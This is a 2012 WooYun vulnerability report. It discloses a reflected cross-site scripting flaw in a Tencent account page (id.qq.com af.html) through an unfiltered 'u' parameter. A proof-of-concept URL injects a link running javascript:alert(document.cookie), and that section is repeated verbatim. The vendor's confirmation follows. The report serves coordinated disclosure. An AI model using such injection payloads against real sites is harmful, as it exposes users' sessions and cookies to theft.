当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-013003

漏洞标题:不知道这个算不算腾讯的跨站

相关厂商:腾讯

漏洞作者: Volltin

提交时间:2012-10-03 10:11

修复时间:2012-11-17 10:11

公开时间:2012-11-17 10:11

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-10-03: 细节已通知厂商并且等待厂商处理中
2012-10-05: 厂商已经确认,细节仅向厂商公开
2012-10-15: 细节向核心白帽子及相关领域专家公开
2012-10-25: 细节向普通白帽子公开
2012-11-04: 细节向实习白帽子公开
2012-11-17: 细节向公众公开

简要描述:

不知道这个算不算腾讯的跨站

详细说明:

之前找到一个网址:
http://id.qq.com/af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888
(我已经在乌云发了,最多算个敏感信息吧)


然后我手一抖:
http://id.qq.com/af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888'


发现根本无过滤。
继续,
http://id.qq.com/af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888%3Cp%3E%3Ca%20href=%22javascript:alert(document.cookie)%22%3E%E6%9F%A5%E7%9C%8B%E8%B5%84%E6%96%99%3C/a%3E%3C/p%3E
点“查看资料”:


弹框框了耶。

漏洞证明:

之前找到一个网址:
http://id.qq.com/af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888
(我已经在乌云发了,最多算个敏感信息吧)


然后我手一抖:
http://id.qq.com/af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888'


发现根本无过滤。
继续,
http://id.qq.com/af/af.html?appid=10021&lang=2052&t=1349190084396&u=888888%3Cp%3E%3Ca%20href=%22javascript:alert(document.cookie)%22%3E%E6%9F%A5%E7%9C%8B%E8%B5%84%E6%96%99%3C/a%3E%3C/p%3E
点“查看资料”:


弹框框了耶。

修复方案:

不用多说

版权声明:转载请注明来源 Volltin@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:3

确认时间:2012-10-05 12:06

厂商回复:

感谢你的反馈!

最新状态:

暂无